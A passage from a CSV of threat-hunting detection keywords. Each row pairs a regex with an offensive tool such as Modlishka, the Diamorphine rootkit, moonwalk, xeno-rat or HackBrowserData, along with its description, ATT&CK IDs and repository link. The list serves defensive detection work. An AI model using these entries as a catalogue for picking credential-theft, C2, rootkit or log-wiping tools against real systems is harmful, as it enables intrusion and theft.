T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode dll --existing --pml *",".{0,1000}\-\-mode\sdll\s\-\-existing\s\-\-pml\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode dll --procmon *",".{0,1000}\-\-mode\sdll\s\-\-procmon\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode proxy --action prototypes --path *prototypes.csv*",".{0,1000}\-\-mode\sproxy\s\-\-action\sprototypes\s\-\-path\s.{0,1000}prototypes\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode proxy --dll *.dll*--external-resources*",".{0,1000}\-\-mode\sproxy\s\-\-dll\s.{0,1000}\.dll.{0,1000}\-\-external\-resources.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode proxy --ghidra *--dll *",".{0,1000}\-\-mode\sproxy\s\-\-ghidra\s.{0,1000}\-\-dll\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*MODE=* REMOTE=*sshimpanzee*",".{0,1000}MODE\=.{0,1000}\sREMOTE\=.{0,1000}sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*ModHideDrv_x64.sys*",".{0,1000}ModHideDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*Modified by: Trevohack aka *SpaceShuttleIO*",".{0,1000}Modified\sby\:\sTrevohack\saka\s.{0,1000}SpaceShuttleIO.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*Modified-Amsi-ScanBuffer-Patch*",".{0,1000}Modified\-Amsi\-ScanBuffer\-Patch.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*ModifiedVulnerableBinaryFormatters\info.txt*",".{0,1000}ModifiedVulnerableBinaryFormatters\\info\.txt.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*Modify the TP_POOL linked list Flinks and Blinks to point to the malicious task*",".{0,1000}Modify\sthe\sTP_POOL\slinked\slist\sFlinks\sand\sBlinks\sto\spoint\sto\sthe\smalicious\stask.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*Modlishka/config*",".{0,1000}Modlishka\/config.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*MODLISHKA_BIN*",".{0,1000}MODLISHKA_BIN.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*Modlishka-linux-amd64*",".{0,1000}Modlishka\-linux\-amd64.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*Modlishka-windows-*-amd64.exe*",".{0,1000}Modlishka\-windows\-.{0,1000}\-amd64\.exe.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*module EvilProxy*",".{0,1000}module\sEvilProxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*module inject *",".{0,1000}module\sinject\s.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*module powerup*",".{0,1000}module\spowerup.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Module to generate shellcode out of raw metasploit shellcode file*",".{0,1000}Module\sto\sgenerate\sshellcode\sout\sof\sraw\smetasploit\sshellcode\sfile.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*MODULE_AUTHOR(""m0nad"")*",".{0,1000}MODULE_AUTHOR\(\""m0nad\""\).{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*MODULE_DESCRIPTION(""LKM rootkit""*",".{0,1000}MODULE_DESCRIPTION\(\""LKM\srootkit\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*MODULE_NAME ""diamorphine""*",".{0,1000}MODULE_NAME\s\""diamorphine\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*modules*daclread.py*",".{0,1000}modules.{0,1000}daclread\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*modules.gtfobins import GTFOBins*",".{0,1000}modules\.gtfobins\simport\sGTFOBins.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*modules.interesting_files import InterestingFiles*",".{0,1000}modules\.interesting_files\simport\sInterestingFiles.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*modules/enumrate.py*",".{0,1000}modules\/enumrate\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*modules/exploits/*.js*",".{0,1000}modules\/exploits\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*modules/exploits/*.rb*",".{0,1000}modules\/exploits\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*modules/nemesis.rb*",".{0,1000}modules\/nemesis\.rb.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*mogwailabs*",".{0,1000}mogwailabs.{0,1000}","offensive_tool_keyword","Github Username","MOGWAI LABS is an infosec boutique with a strong emphasis on offensive security github repo hosting offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mogwailabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mojo.5688.8052.183894939787088877##*",".{0,1000}mojo\.5688\.8052\.183894939787088877\#\#.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe name","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*mojo.5688.8052.35780273329370473##*",".{0,1000}mojo\.5688\.8052\.35780273329370473\#\#.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe name","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*mojo_##*",".{0,1000}mojo_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*monero2john.py*",".{0,1000}monero2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*money2john.py*",".{0,1000}money2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*mongodb2john.js*",".{0,1000}mongodb2john\.js.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Monkey Island v*_windows.exe*",".{0,1000}Monkey\sIsland\sv.{0,1000}_windows\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey*tunnel.py*",".{0,1000}monkey.{0,1000}tunnel\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey\infection_monkey*",".{0,1000}monkey\\infection_monkey.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey_island.exe*",".{0,1000}monkey_island\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey32.exe *",".{0,1000}monkey32\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey64.exe *",".{0,1000}monkey64\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey-linux-32*",".{0,1000}monkey\-linux\-32.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey-linux-64*",".{0,1000}monkey\-linux\-64.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey-windows-32.exe*",".{0,1000}monkey\-windows\-32\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monkey-windows-64.exe*",".{0,1000}monkey\-windows\-64\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*monoxgas/Koppeling*",".{0,1000}monoxgas\/Koppeling.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*monoxgas/sRDI*",".{0,1000}monoxgas\/sRDI.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*moom825/xeno-rat*",".{0,1000}moom825\/xeno\-rat.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*moonD4rk/HackBrowserData*",".{0,1000}moonD4rk\/HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","94","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*moonwalk finish*",".{0,1000}moonwalk\sfinish.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*moonwalk get *history*",".{0,1000}moonwalk\sget\s.{0,1000}history.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*moonwalk start*",".{0,1000}moonwalk\sstart.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*MooseDojo*",".{0,1000}MooseDojo.{0,1000}","offensive_tool_keyword","Github Username","github repo that was hosting exploitation tools. may be used by other exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/MooseDojo","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*morphHTA*",".{0,1000}morphHTA.{0,1000}","offensive_tool_keyword","morphHTA","morphHTA - Morphing Cobalt Strikes evil.HTA payload generator","T1059.007 - T1027.002 - T1564.001 - T1547.001","TA0002 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/vysecurity/morphHTA","1","1","N/A","N/A","6","514","132","2023-04-14T19:15:57Z","2017-02-24T11:27:00Z" "*mortar-loader.html*",".{0,1000}mortar\-loader\.html.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*mortar-main.zip*",".{0,1000}mortar\-main\.zip.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*mosquitto2john.py*",".{0,1000}mosquitto2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*MotdPersistence*",".{0,1000}MotdPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*Mount-VolumeShadowCopy*",".{0,1000}Mount\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*mousejack*",".{0,1000}mousejack.{0,1000}","offensive_tool_keyword","mousejack","MouseJack device discovery and research tools","T1179 - T1059 - T1065 - T1057","TA0011 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch/mousejack","1","1","N/A","10","10","1255","257","2017-12-19T10:16:25Z","2016-02-23T14:19:38Z" "*Mouselogger.ps1*",".{0,1000}Mouselogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 